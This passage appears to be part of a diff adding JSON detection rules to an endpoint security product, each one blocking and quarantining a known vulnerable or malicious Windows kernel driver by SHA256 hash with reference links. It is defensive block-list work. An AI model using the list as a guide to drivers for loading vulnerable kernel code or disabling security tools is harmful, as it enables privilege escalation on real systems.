+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610863Z",
+ "creation_date": "2026-03-23T11:45:29.610865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610888Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f74ffd6916333662900cbecb90aca2d6475a714ce410adf9c5c3264abbe5732c",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d5f732a-c3a1-56c0-ac93-907e27a780ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144164Z",
+ "creation_date": "2026-03-23T11:45:32.144167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4421ff85aacbcc36695a018c5c47e884d56d62d7d5b8172bb70384ffc4d6a2e4",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d630ebb-7662-536e-954f-952943480618",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824536Z",
+ "creation_date": "2026-03-23T11:45:30.824540Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ebb1ec918e1cfb6f9b3e93f0a60f0db48b7aea59810a4f31cf26ab118cd988d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d63a7aa-64b4-525b-ba91-6f1d4ee8165a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479505Z",
+ "creation_date": "2026-03-23T11:45:31.479509Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a1caec70d9dad22668bdddbe246c9b30c2ed79477726a361da7701385d4d09b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d65e827-a375-5c6d-bb1f-42dc8ee08c58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828252Z",
+ "creation_date": "2026-03-23T11:45:31.828255Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828263Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d67f261038e85da36d146f7c024e10d13fcee24f5d033600791ea63bde0c5a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d759d9d-d434-57fc-b96d-65d0206e6165",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827326Z",
+ "creation_date": "2026-03-23T11:45:30.827328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a38b669c7f300abe26a58a6f4659534807f54ea885f27debcc4daba8cea9ace1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d7a363f-5f96-5f3b-a865-87c6a04a4378",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817268Z",
+ "creation_date": "2026-03-23T11:45:30.817270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "129bfa559bde499f748cffc218f2b7ec4b22ee3114ceae8e386fbbe4e58e4523",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d7e5698-f590-5c82-a080-152bec8d3aae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151003Z",
+ "creation_date": "2026-03-23T11:45:31.151005Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151010Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58bb0343ba788e72c723014cbea43820b05159be07b903a6c97ee426bdce753f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d86b900-97bc-56ec-8868-e4fdfa13539c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146796Z",
+ "creation_date": "2026-03-23T11:45:31.146797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45c4998d19df334deff602a8596ad512bee00f5e536fb91dc87d5337646a3638",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d89a721-68f1-5bda-9794-721b19291e3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152857Z",
+ "creation_date": "2026-03-23T11:45:31.152860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152883Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0fa17d520322412e349284f172fa0f13ca4ef58956e00d367fd0bfabe18c2ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d920d27-cc58-5646-b70e-d907d093ae5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154169Z",
+ "creation_date": "2026-03-23T11:45:31.154171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c3060d8b89d166ce600f28b9a403a70544adf108b0e2c3e09692c810023e879",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d9854a2-a760-588e-8af2-8c2463967084",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824403Z",
+ "creation_date": "2026-03-23T11:45:30.824405Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e15e71021dc3bc0ccf6a0ad825d004b42feea9cf1c0f3d8510edfa26dce2ee5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0d9e5653-e538-57b2-aba0-26a0c34f14e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986154Z",
+ "creation_date": "2026-03-23T11:45:29.986156Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43b7715e38449bf82ad0bb6b11d03da42150c1ee23148c5f396cc4ab1001622d",
+ "comment": "Vulnerable Kernel Driver (aka directio.sys) [https://www.loldrivers.io/drivers/a2c3f6e9-25a5-4b75-8c6b-ad2d4e155822/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0dbf5b7f-cd7d-5a8a-9f3c-9e6d2901c2b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495604Z",
+ "creation_date": "2026-03-23T11:45:31.495607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8461e722353e4ca2ff34fbef078c850c16498ed7a6d7581f20ee421584010f70",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0dc1c543-d24e-5c3f-b42b-1a6bb7c2cbe4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815785Z",
+ "creation_date": "2026-03-23T11:45:30.815787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17942865680bd3d6e6633c90cc4bd692ae0951a8589dbe103c1e293b3067344d",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0dd17a6f-ac8c-50b8-b91a-95255e0eb552",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472433Z",
+ "creation_date": "2026-03-23T11:45:30.472436Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e51ec2876af3c9c3f1563987a9a35a10f091ea25ede16b1a34ba2648c53e9dfc",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ddb945b-8a83-5c19-a6e8-2fcc0b6cd4be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971802Z",
+ "creation_date": "2026-03-23T11:45:29.971804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971810Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23ab90e1990b4c5250f7bacbc7ff90e989583a2ccacf4ba333255f1d385d0ad8",
+ "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0dde037c-0457-5836-a6be-ec538971fcff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820567Z",
+ "creation_date": "2026-03-23T11:45:31.820569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a34ccbaf4dfd2dd8c97d5d346abf177e7b1a5d97d462053eae75bc53f48b949b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ddf9429-89f6-57e3-b49c-dbe3f4711d32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607012Z",
+ "creation_date": "2026-03-23T11:45:29.607014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607019Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19d579e5a08bcb524405bdcbd2ea7247548af9f23ce64582a5be5ae3f184ad23",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0de38a08-7c51-5dfe-afc0-72ab6e44b7f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456624Z",
+ "creation_date": "2026-03-23T11:45:30.456627Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "507724d96a54f3e45c16a065bf38ae82a9b80d07096a461068a701cae0c1cf29",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0de8afcf-6164-5207-972e-316b527d0aca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820685Z",
+ "creation_date": "2026-03-23T11:45:30.820687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07d0090c76155318e78a676e2f8af1500c20aaa1e84f047c674d5f990f5a09c8",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0de8dc3b-7182-5698-a360-0dd92ddb48d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985612Z",
+ "creation_date": "2026-03-23T11:45:29.985614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92f9d73cec5ab3352c4b3cbf4574d13b2e506cba24cc74580e19e941063eaf7d",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://ioctl.fail/echo-ac-writeup/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0df226fe-4357-5400-b1c3-18658b719d53",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481358Z",
+ "creation_date": "2026-03-23T11:45:31.481362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
